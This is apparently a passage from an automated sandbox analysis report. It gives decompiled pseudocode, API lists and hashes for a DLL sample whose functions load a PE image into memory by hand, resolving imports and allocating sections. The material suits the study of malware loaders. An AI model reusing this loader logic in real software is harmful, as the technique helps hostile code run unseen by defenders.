                                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                                  						_t9 =  *_v8 + 0x28; // 0x1ab8068
                                                                                                                                                                  						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
                                                                                                                                                                  						__eflags = _t93;
                                                                                                                                                                  						_v12 = _t93;
                                                                                                                                                                  						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push( *((intOrPtr*)(_v8 + 0x30)));
                                                                                                                                                                  					E1000CA40(_t68, _t94, _t95, __eflags);
                                                                                                                                                                  					_t97 = _t96 + 4;
                                                                                                                                                                  					_t70 = _v8;
                                                                                                                                                                  					__eflags =  *(_t70 + 8);
                                                                                                                                                                  					if( *(_t70 + 8) == 0) {
                                                                                                                                                                  						L12:
                                                                                                                                                                  						_t52 = _v8;
                                                                                                                                                                  						__eflags =  *(_t52 + 4);
                                                                                                                                                                  						if( *(_t52 + 4) != 0) {
                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                                  						}
                                                                                                                                                                  						return HeapFree(GetProcessHeap(), 0, _v8);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v16 = 0;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t60 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                  							_t76 = _v16;
                                                                                                                                                                  							__eflags =  *(_t60 + _t76 * 4);
                                                                                                                                                                  							if( *(_t60 + _t76 * 4) != 0) {
                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                                  								_t97 = _t97 + 8;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t87 = _v16 + 1;
                                                                                                                                                                  							__eflags = _t87;
                                                                                                                                                                  							_v16 = _t87;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                  						E1000CA40(_t68, _t94, _t95, __eflags);
                                                                                                                                                                  						_t97 = _t97 + 4;
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t49;
                                                                                                                                                                  			}




















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA9C), ref: 1001AAA2
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,1001BA9C), ref: 1001AAA9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                  • Opcode ID: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
                                                                                                                                                                  • Instruction ID: 036dfcbbb1d5d3e23a27430c7b480aaf999080cef5cc33bc9f92b78f6dea735d
                                                                                                                                                                  • Opcode Fuzzy Hash: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C319278A00108EFDB04DB94C684B9DB7B6FF89304F648198E9055B391D775EE81DB81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001AC03() {
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  				intOrPtr _t97;
                                                                                                                                                                  				signed int _t99;
                                                                                                                                                                  				signed int _t106;
                                                                                                                                                                  				signed int _t114;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  				void* _t121;
                                                                                                                                                                  				void* _t127;
                                                                                                                                                                  				signed int _t173;
                                                                                                                                                                  				void* _t180;
                                                                                                                                                                  				void* _t181;
                                                                                                                                                                  				void* _t182;
                                                                                                                                                                  				void* _t184;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				void* _t187;
                                                                                                                                                                  
                                                                                                                                                                  				L0:
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L0:
                                                                                                                                                                  					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
                                                                                                                                                                  					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					L3:
                                                                                                                                                                  					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                  					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
                                                                                                                                                                  					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
                                                                                                                                                                  					_t186 = _t184 + 8;
                                                                                                                                                                  					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
                                                                                                                                                                  					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                  						_push(4 +  *_t17 * 4);
                                                                                                                                                                  						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                                  						_push( *_t21);
                                                                                                                                                                  						_t99 = E1000E078(_t127,  *_t21, _t180, _t181, __eflags);
                                                                                                                                                                  						_t187 = _t186 + 8;
                                                                                                                                                                  						 *(_t182 - 0x18) = _t99;
                                                                                                                                                                  						__eflags =  *(_t182 - 0x18);
                                                                                                                                                                  						if( *(_t182 - 0x18) != 0) {
                                                                                                                                                                  							L7:
                                                                                                                                                                  							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
                                                                                                                                                                  							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                  							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                                  							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
                                                                                                                                                                  							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                  							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
                                                                                                                                                                  							__eflags =  *( *(_t182 - 4));
                                                                                                                                                                  							if( *( *(_t182 - 4)) == 0) {
                                                                                                                                                                  								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                  								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                  								__eflags = _t106;
                                                                                                                                                                  								 *(_t182 - 0x14) = _t106;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
                                                                                                                                                                  								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                  							}
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								L12:
                                                                                                                                                                  								__eflags =  *( *(_t182 - 0x1c));
                                                                                                                                                                  								if( *( *(_t182 - 0x1c)) == 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								L13:
                                                                                                                                                                  								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
                                                                                                                                                                  								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
                                                                                                                                                                  									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
                                                                                                                                                                  									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                  									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
                                                                                                                                                                  									__eflags = _t114;
                                                                                                                                                                  									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                                  									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
                                                                                                                                                                  									_t187 = _t187 + 0xc;
                                                                                                                                                                  									 *( *(_t182 - 0x14)) = _t116;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                  									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                                  									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
                                                                                                                                                                  									_t187 = _t187 + 0xc;
                                                                                                                                                                  									 *( *(_t182 - 0x14)) = _t121;
                                                                                                                                                                  								}
                                                                                                                                                                  								L16:
                                                                                                                                                                  								__eflags =  *( *(_t182 - 0x14));
                                                                                                                                                                  								if( *( *(_t182 - 0x14)) != 0) {
                                                                                                                                                                  									L18:
                                                                                                                                                                  									L11:
                                                                                                                                                                  									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
                                                                                                                                                                  									_t173 =  *(_t182 - 0x14) + 4;
                                                                                                                                                                  									__eflags = _t173;
                                                                                                                                                                  									 *(_t182 - 0x14) = _t173;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									L17:
                                                                                                                                                                  									 *(_t182 - 0xc) = 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							L19:
                                                                                                                                                                  							__eflags =  *(_t182 - 0xc);
                                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                                  								L21:
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								L20:
                                                                                                                                                                  								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                  								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                                  								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
                                                                                                                                                                  								SetLastError(0x7f);
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							L6:
                                                                                                                                                                  							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                  							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                                  							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
                                                                                                                                                                  							SetLastError(0xe);
                                                                                                                                                                  							 *(_t182 - 0xc) = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						L4:
                                                                                                                                                                  						SetLastError(0x7e);
                                                                                                                                                                  						 *(_t182 - 0xc) = 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					break;
                                                                                                                                                                  				}
                                                                                                                                                                  				L22:
                                                                                                                                                                  				_t93 =  *(_t182 - 0xc);
                                                                                                                                                                  				return _t93;
                                                                                                                                                                  			}


















                                                                                                                                                                  0x1001adad
                                                                                                                                                                  0x1001adb1
                                                                                                                                                                  0x1001add3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001adb3
                                                                                                                                                                  0x1001adb3
                                                                                                                                                                  0x1001adb6
                                                                                                                                                                  0x1001adc1
                                                                                                                                                                  0x1001adc4
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001ac8c
                                                                                                                                                                  0x1001ac8c
                                                                                                                                                                  0x1001ac8f
                                                                                                                                                                  0x1001ac9a
                                                                                                                                                                  0x1001ac9d
                                                                                                                                                                  0x1001aca4
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001ac52
                                                                                                                                                                  0x1001ac52
                                                                                                                                                                  0x1001ac54
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac50
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x1001adde

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  • _realloc.LIBCMT ref: 1001AC7B
                                                                                                                                                                  • SetLastError.KERNEL32(0000000E), ref: 1001ACA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Read_realloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 252108943-0
                                                                                                                                                                  • Opcode ID: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
                                                                                                                                                                  • Instruction ID: e88f51b13af380f3804dcf3f93825a158e3d85187cb32834387337e861583c44
                                                                                                                                                                  • Opcode Fuzzy Hash: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
                                                                                                                                                                  • Instruction Fuzzy Hash: EE01EF74A00208EFDB04CF94D985BADB7B1FF49315F618198E90AAB390C778AA81DF50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E1001B360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  				void* _t140;
                                                                                                                                                                  				void* _t141;
                                                                                                                                                                  				void* _t142;
                                                                                                                                                                  				void* _t143;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  				void* _t145;
                                                                                                                                                                  
                                                                                                                                                                  				_t141 = __esi;
                                                                                                                                                                  				_t140 = __edi;
                                                                                                                                                                  				_t100 = __ebx;
                                                                                                                                                                  				_t2 = _a16 + 4; // 0xe90575c0
                                                                                                                                                                  				_v20 =  *_t2;
                                                                                                                                                                  				_t6 =  *_a16 + 0x14; // 0x2b34508b
                                                                                                                                                                  				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b9bd
                                                                                                                                                                  				_v24 =  *_a16 + _t8;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t16 =  *_a16 + 6; // 0xe2e905
                                                                                                                                                                  					if(_v8 >= ( *_t16 & 0x0000ffff)) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
                                                                                                                                                                  						_t44 = _v24 + 0x14; // 0x2b34508b
                                                                                                                                                                  						_t46 = _v24 + 0x10; // 0xb04d8b02
                                                                                                                                                                  						_t78 = E1001AEA0(_a8,  *_t44 +  *_t46);
                                                                                                                                                                  						_t143 = _t142 + 8;
                                                                                                                                                                  						if(_t78 != 0) {
                                                                                                                                                                  							_t49 = _a16 + 0x34; // 0x8b0aeb18
                                                                                                                                                                  							_t51 = _v24 + 0x10; // 0xb04d8b02
                                                                                                                                                                  							_t54 = _v24 + 0xc; // 0x8bb8558b
                                                                                                                                                                  							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
                                                                                                                                                                  							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
                                                                                                                                                                  							_t144 = _t143 + 0x14;
                                                                                                                                                                  							_v12 = _t82;
                                                                                                                                                                  							if(_v12 != 0) {
                                                                                                                                                                  								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                  								E1000D1F0(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
                                                                                                                                                                  								_t142 = _t144 + 0xc;
                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                  								L1:
                                                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                                                  								_v24 = _v24 + 0x28;
                                                                                                                                                                  								continue;
                                                                                                                                                                  							}
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                                                                                  					if(_v16 <= 0) {
                                                                                                                                                                  						L8:
                                                                                                                                                                  						goto L1;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t25 = _a16 + 0x34; // 0x8b0aeb18
                                                                                                                                                                  					_t29 = _v24 + 0xc; // 0x8bb8558b
                                                                                                                                                                  					_t31 = _a16 + 0x1c; // 0x8b1874b4
                                                                                                                                                                  					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
                                                                                                                                                                  					_t145 = _t142 + 0x14;
                                                                                                                                                                  					_v12 = _t95;
                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                  						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                  						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                  						E1000CF80(_t140, _v12, 0, _v16);
                                                                                                                                                                  						_t142 = _t145 + 0xc;
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}


















                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b449
                                                                                                                                                                  0x1001b3c0
                                                                                                                                                                  0x1001b3c7
                                                                                                                                                                  0x1001b427
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b427
                                                                                                                                                                  0x1001b3cc
                                                                                                                                                                  0x1001b3e1
                                                                                                                                                                  0x1001b3e8
                                                                                                                                                                  0x1001b3eb
                                                                                                                                                                  0x1001b3ed
                                                                                                                                                                  0x1001b3f0
                                                                                                                                                                  0x1001b3f7
                                                                                                                                                                  0x1001b409
                                                                                                                                                                  0x1001b412
                                                                                                                                                                  0x1001b41f
                                                                                                                                                                  0x1001b424
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b424
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b3f9
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                                                  • Opcode ID: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
                                                                                                                                                                  • Instruction ID: 428323ba92f151b8b30d7bb4fc73863c6a18c270ec47e82ee642a415afc306ef
                                                                                                                                                                  • Opcode Fuzzy Hash: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
                                                                                                                                                                  • Instruction Fuzzy Hash: B151B8B4A0010ADFCB04DF94D991EAEB7B5FF48304F248598E915AB346D730EE91CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB50(void* __ecx, CHAR* _a4) {
                                                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                                                  				struct HINSTANCE__* _t6;
                                                                                                                                                                  
                                                                                                                                                                  				_t6 = LoadLibraryA(_a4); // executed
                                                                                                                                                                  				_v8 = _t6;
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					return _v8;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
                                                                                                                                                                  • Instruction ID: 7c1de59f615f24355edd2097ee5eee0132e4033acb49ab430aa32c1c2748079c
                                                                                                                                                                  • Opcode Fuzzy Hash: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
                                                                                                                                                                  • Instruction Fuzzy Hash: 54D0927494924CEBCB10DFA4D988A8DB7F8EB09651F204595ED0997201D6319EC09AA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB20(struct HINSTANCE__* _a4) {
                                                                                                                                                                  				int _t3;
                                                                                                                                                                  
                                                                                                                                                                  				_t3 = FreeLibrary(_a4); // executed
                                                                                                                                                                  				return _t3;
                                                                                                                                                                  			}





                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
                                                                                                                                                                  • Instruction ID: 0a2297a1539f5fd842531728876dcceabbf5482a0c4fce057fc6f77852d15200
                                                                                                                                                                  • Opcode Fuzzy Hash: ab945b5bb3a6449f56287117bc969cb560d4c6e8115a263d146fdd92f26bef0a
                                                                                                                                                                  • Instruction Fuzzy Hash: BBB0123200031CABCE005BD8D8888C537AC96085117010000F70C83100CA30F48046D4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				void* _t5;
                                                                                                                                                                  				void* _t13;
                                                                                                                                                                  
                                                                                                                                                                  				E100152B4();
                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                  				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
                                                                                                                                                                  				return _t5;
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • ___security_init_cookie.LIBCMT ref: 1000EC31
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___security_init_cookie
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3657697845-0
                                                                                                                                                                  • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction ID: e6deafa1040a52db75f664394f4ca8d863cdd32d4507f565b6a3541a6f58ca8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B0923A10A340EB8204CB20D482C0FB3A2EBD4311F24C90DF8A61A2558B31EC60EA52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E10004530(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                  				signed char* _v56;
                                                                                                                                                                  				char _v128;
                                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                                  				void* _v136;
                                                                                                                                                                  				void* _v140;
                                                                                                                                                                  				void* _v144;
                                                                                                                                                                  				char* _v148;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                  				intOrPtr _v172;
                                                                                                                                                                  				intOrPtr _v176;
                                                                                                                                                                  				intOrPtr _v180;
                                                                                                                                                                  				char _v184;
                                                                                                                                                                  				char _v188;
                                                                                                                                                                  				char _v192;
                                                                                                                                                                  				intOrPtr _v196;
                                                                                                                                                                  				char _v200;
                                                                                                                                                                  				char _v204;
                                                                                                                                                                  				char _v208;
                                                                                                                                                                  				intOrPtr _v212;
                                                                                                                                                                  				char _v216;
                                                                                                                                                                  				char _v220;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				intOrPtr _t55;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				intOrPtr* _t76;
                                                                                                                                                                  				intOrPtr _t86;
                                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  				void* _t102;
                                                                                                                                                                  
                                                                                                                                                                  				_t102 = __eflags;
                                                                                                                                                                  				_t55 = _a4;
                                                                                                                                                                  				_t96 = _a8;
                                                                                                                                                                  				_v184 = E100044A0;
                                                                                                                                                                  				_v180 = E100044D0;
                                                                                                                                                                  				_v176 = _t55;
                                                                                                                                                                  				_v172 = _t55;
                                                                                                                                                                  				_v168 = _t96;
                                                                                                                                                                  				_t97 = 0;
                                                                                                                                                                  				E10007200();
                                                                                                                                                                  				_v216 = E100046D0;
                                                                                                                                                                  				_v212 = E100046F0;
                                                                                                                                                                  				_v200 = E100046D0;
                                                                                                                                                                  				_v196 = E100046F0;
                                                                                                                                                                  				E10007540( &_v164, 0);
                                                                                                                                                                  				_v136 = 0;
                                                                                                                                                                  				_v136 = _v216( &_v216, _t96);
                                                                                                                                                                  				_v132 = _t96;
                                                                                                                                                                  				_v148 =  &_v184;
                                                                                                                                                                  				_v140 = 0;
                                                                                                                                                                  				_v144 = 0;
                                                                                                                                                                  				E100048B0(_t102,  &_v128);
                                                                                                                                                                  				_t63 = E10006FE0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
                                                                                                                                                                  				_t100 =  &_v220 + 0x24;
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					_v204 = 0xffffffff;
                                                                                                                                                                  					_v208 = 0;
                                                                                                                                                                  					_v220 = 0;
                                                                                                                                                                  					_v192 = 0;
                                                                                                                                                                  					_v188 = 0;
                                                                                                                                                                  					if(( *_v56 & 0x00000080) == 0) {
                                                                                                                                                                  						_t70 = E10007020( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
                                                                                                                                                                  						_t100 = _t100 + 0x28;
                                                                                                                                                                  						if(_t70 == 0) {
                                                                                                                                                                  							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
                                                                                                                                                                  							_t97 = _t73;
                                                                                                                                                                  							if(_t97 != 0) {
